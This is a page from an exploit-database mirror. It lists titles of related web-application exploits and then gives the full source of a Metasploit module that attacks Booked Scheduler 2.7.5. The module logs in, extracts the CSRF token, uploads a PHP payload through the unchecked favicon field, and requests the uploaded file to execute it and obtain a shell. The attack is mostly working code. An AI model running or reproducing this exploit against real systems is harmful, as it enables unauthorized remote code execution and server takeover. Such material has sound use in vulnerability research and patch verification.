Menu

Improved exploit search engine. Try python and hit enter

"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)"

Author

AkkuS

Platform

php

Release date

2019-03-04

Release Date Title Type Platform Author
2019-03-22 "Inout Article Base CMS - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Meeplace Business Review Script - 'id' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Matri4Web Matrimony Website Script - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Bootstrapy CMS - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Placeto CMS Alpha v4 - 'page' SQL Injection" webapps php "Abdullah Çelebi"
2019-03-21 "uHotelBooking System - 'system_page' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "The Company Business Website CMS - Multiple Vulnerabilities" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Netartmedia Vlog System - 'email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia Deals Portal - 'Email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "202CMS v10beta - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-20 "Netartmedia PHP Business Directory 4.2 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Dating Site - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia Jobs Portal 6.1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Real Estate Agency 4.0 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Car Dealer - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia Real Estate Portal 5.0 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia PHP Mall 4.1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia Event Portal 2.0 - 'Email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "eNdonesia Portal 8.7 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-19 "MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting" webapps php 0xB9
2019-03-19 "Gila CMS 1.9.1 - Cross-Site Scripting" webapps php "Ahmet Ümit BAYRAM"
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Moodle 3.4.1 - Remote Code Execution" webapps php "Darryn Ten"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
2019-03-14 "Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution" webapps php R3zk0n
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
Release Date Title Type Platform Author
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-03-11 "Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)" webapps multiple AkkuS
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-01-24 "SirsiDynix e-Library 3.5.x - Cross-Site Scripting" webapps cgi AkkuS
2019-01-18 "Webmin 1.900 - Remote Command Execution (Metasploit)" remote cgi AkkuS
2019-01-10 "eBrigade ERP 4.5 - Arbitrary File Download" webapps php AkkuS
2019-01-02 "Vtiger CRM 7.1.0 - Remote Code Execution" webapps php AkkuS
2018-12-19 "Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)" webapps php AkkuS
2018-12-09 "i-doit CMDB 1.11.2 - Remote Code Execution" webapps php AkkuS
2018-12-04 "Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting" webapps php AkkuS
2018-12-03 "Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution" webapps php AkkuS
2018-11-21 "WebOfisi E-Ticaret V4 - 'urun' SQL Injection" webapps php AkkuS
2018-11-06 "OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection" webapps php AkkuS
2018-11-05 "PHP Proxy 3.0.3 - Local File Inclusion" webapps php AkkuS
2018-11-02 "qdPM 9.1 - 'filter_by' SQL Injection" webapps php AkkuS
2018-09-25 "Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection" webapps php AkkuS
2018-09-25 "Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection" webapps php AkkuS
2018-09-04 "PHP File Browser Script 1 - Directory Traversal" webapps php AkkuS
2018-09-04 "Logicspice FAQ Script 2.9.7 - Remote Code Execution" webapps php AkkuS
2018-09-03 "Online Quiz Maker 1.0 - 'catid' SQL Injection" webapps php AkkuS
2018-10-25 "ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution" webapps php AkkuS
2018-08-02 "PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection" webapps php AkkuS
2018-08-02 "TI Online Examination System v2 - Arbitrary File Download" webapps php AkkuS
2018-07-18 "FTP2FTP 1.0 - Arbitrary File Download" webapps php AkkuS
2018-07-18 "Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection" webapps php AkkuS
2018-05-28 "WordPress Plugin Events Calendar - SQL Injection" webapps php AkkuS
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46486/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
## 
# This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 
## 
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking 
 
  include Msf::Exploit::Remote::HttpClient 
 
    def initialize 
    super( 
      'Name'           => 'Booked Scheduler v2.7.5 - Remote Command Execution', 
      'Description'    => %q{ 
        This module exploits a file upload vulnerability Booked 2.7.5. 
        In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files.  
        Upload sections has file extension control except favicon part.
        You can upload the file with the extension you want through the Favicon field.
        The file you upload is written to the main directory of the site under the name "custom-favicon". 
        After upload the php payload to the main directory, Exploit executes payload and receives shell.  
      }, 
      'Author'         => [ 
        'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module 
        ], 
      'License'        => MSF_LICENSE, 
      'References'     => 
        [
          ['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'],  
        ], 
      'Platform'       => ['php'], 
      'Arch'           => ARCH_PHP, 
      'Targets'        => 
        [ 
          ['Booked Scheduler v2.7.5', {}] 
        ], 
      'DisclosureDate' => '01 March 2019', 
      'Privileged'     => false,       
      'DefaultTarget' => 0 
    ) 
 
    register_options( 
        [ 
          OptBool.new('SSL', [true, 'Use SSL', false]),
          OptString.new('TARGETURI', [true, 'The base path to Booked', '/']), 
          OptString.new('USER', [true, 'User to login with', 'admin']), 
          OptString.new('PASS', [true, 'Password to login with', 'admin']), 
        ], self.class) 
    end 
##
# Check Exploit Vulnerable
##  
  def check
    res = send_request_cgi({ 
      'method' => 'GET',  
      'uri'    => normalize_uri(target_uri, "/Web/index.php")      
    })

   if res and res.code == 200 and res.body =~ /v2.7.5/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
    return res 
  end  
##
# Exploit Portion
##  
  def exploit 
    res = send_request_cgi({ 
      'method' => 'POST', 
      'uri'    => normalize_uri(target_uri, "/Web/index.php"), 
      'vars_post' => { 
          "email" => datastore['USER'], 
          "password" => datastore['PASS'],
          "captcha" => "",
          "resume" => "",
          "language" => "en_us",
          "login" => "submit" 
           
      } 
    })

   if res and res.code == 302
      print_status("Successful redirection to admin dashboard.")
    else
      return res
    end
 
    get_cookie = res.get_cookies 
    cookie = get_cookie 
##
# Login Access Control
##
    control = send_request_cgi({ 
      'method' => 'GET', 
      'cookie' => cookie, 
      'uri'    => normalize_uri(target_uri, "/Web/dashboard.php")      
    })

    html = control.body
    if html =~ /Dashboard/
      print_good("Login successfuly")
    else
      print_status("User information is incorrect. Login failed")
      exit 0
    end 
##
# Reading CSRF Token
##
    csrf = send_request_cgi({ 
      'method' => 'GET', 
      'cookie' => cookie, 
      'uri'    => normalize_uri(target_uri, "/Web/admin/manage_theme.php")      
    })

    html = control.body
    if html =~ /Look and Feel/
      token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
      print_status("CSRF Token = #{token}")
    else
      print_status("User information is incorrect. Login failed")
      exit 0
    end 
##
# Loading phase of the vulnerable file
##
    boundary = Rex::Text.rand_text_alphanumeric(29)

    data2 = "-----------------------------{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n"
    data2 << "-----------------------------{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\""
    data2 << "\r\nContent-Type: text/html\r\n\r\n"
    data2 << payload.encoded
    data2 << "\n\r\n-----------------------------{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n"
    data2 << "-----------------------------{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n"
    data2 << "#{token}"
    data2 << "\r\n-----------------------------{boundary}--\r\n"

    res = send_request_raw(
      {
        'method' => "POST",
        'uri'     => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"),
        'data' => data2,
        'headers' =>
        {
          'Content-Type'   => 'multipart/form-data; boundary=---------------------------{boundary}',
        },
        'cookie'  => cookie
      })

    if res and res.code == 200
      print_good "Payload was successfully uploaded."
    else
      print_error "Upload failed."
      return
    end 
##
# Command execution and shell retrieval
##
    print_status("Attempting to execute the payload...")

    command = payload.encoded

    res = send_request_cgi(
      {
        'uri'     => normalize_uri(target_uri, "/Web/custom-favicon.php"),
        'cookie'  => cookie
      }, 25)


    if res and res.code == 200
      print_good "Payload executed successfully"
    end    
  end     
end
##
# End
##